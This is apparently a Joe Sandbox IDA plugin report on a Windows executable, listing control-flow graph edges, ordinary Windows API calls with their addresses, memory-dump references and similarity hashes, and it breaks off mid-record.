                                                                                    control_flow_graph 330 407749-40774a 331 4076dc-4076e6 WriteFile 330->331 332 40774c-40776f 330->332 334 4076e8-4076ea call 40748c 331->334 335 4076ef-4076f2 331->335 333 407770-407785 332->333 336 407787 333->336 337 4077f9 333->337 334->335 339 407700-407704 335->339 340 4076f4-4076fb call 4073ec 335->340 342 40778a-40778f 336->342 343 4077fd-407802 336->343 344 40783b-40783d 337->344 345 4077fb 337->345 340->339 348 407803-407819 342->348 350 407791-407792 342->350 343->348 346 407841-407843 344->346 345->343 349 40785b-40785c 346->349 348->349 359 40781b 348->359 351 4078d6-4078eb call 407890 InterlockedExchange 349->351 352 40785e-40788c 349->352 353 407724-407741 350->353 354 407794-4077b4 350->354 375 407912-407917 351->375 376 4078ed-407910 351->376 369 407820-407823 352->369 370 407890-407893 352->370 356 407743 353->356 357 4077b5 353->357 354->357 361 407746-407747 356->361 362 4077b9 356->362 364 4077b6-4077b7 357->364 365 4077f7-4077f8 357->365 366 40781e-40781f 359->366 361->330 368 4077bb-4077cd 361->368 362->368 364->362 365->337 366->369 368->346 373 4077cf-4077d4 368->373 372 407898 369->372 374 407824 369->374 370->372 377 40789a 372->377 373->344 380 4077d6-4077de 373->380 374->377 379 407825 374->379 376->375 376->376 383 40789f 377->383 381 407896-407897 379->381 382 407826-40782d 379->382 380->333 392 4077e0 380->392 381->372 385 4078a1 382->385 386 40782f 382->386 383->385 390 4078a3 385->390 391 4078ac 385->391 388 407832-407833 386->388 389 4078a5-4078aa 386->389 388->344 388->366 393 4078ae-4078af 389->393 390->389 391->393 392->365 393->383 394 4078b1-4078bd 393->394 394->372 395 4078bf-4078c0 394->395
                                                                                    APIs
                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                    • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                    • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                    • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 396 401658-40168d 397 4016c7-4016cd 396->397 398 40168f-40169a 397->398 399 4016cf-4016d4 397->399 400 40169c 398->400 401 40169f-4016a1 398->401 400->401 402 4016a3 401->402 403 4016a5-4016a7 401->403 402->403 404 4016c5 403->404 405 4016a9-4016b9 VirtualFree 403->405 404->397 405->404 406 4016bb 405->406 406->404
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID: 4F
                                                                                    • API String ID: 1263568516-474559816
                                                                                    • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                    • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                    • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                    • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 407 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                    • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                    • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                    • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                    APIs
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 1156039329-0
                                                                                    • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                    • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                    • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                    • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 411 40762c-40764a ReadFile 412 407663-40766a 411->412 413 40764c-407650 411->413 414 407652-40765a GetLastError 413->414 415 40765c-40765e call 40748c 413->415 414->412 414->415 415->412
                                                                                    APIs
                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastRead
                                                                                    • String ID:
                                                                                    • API String ID: 1948546556-0
                                                                                    • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                    • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                    • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                    • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                    APIs
                                                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 1156039329-0
                                                                                    • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                    • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                    • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                    • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                    APIs
                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                      • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                      • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1658689577-0
                                                                                    • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                    • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                    • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                    • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                    • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                    • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                    • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                    • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                    • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                    • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                    • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                    • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                    • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                    APIs
                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastWrite
                                                                                    • String ID:
                                                                                    • API String ID: 442123175-0
                                                                                    • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                    • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                    • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                    • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                    APIs
                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                    • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                    • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                    • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNEL32(?,02087CA4,0040A08C,00000000), ref: 004076B3
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 734332943-0
                                                                                    • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                    • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                    • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                    • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                    • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                    • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                    • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                    • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                    • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                    • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                    APIs
                                                                                    • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrev
                                                                                    • String ID:
                                                                                    • API String ID: 122130370-0
                                                                                    • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                    • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                    • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                    • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                    • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                    • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                    • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                    • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                    • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1263568516-0
                                                                                    • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                    • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
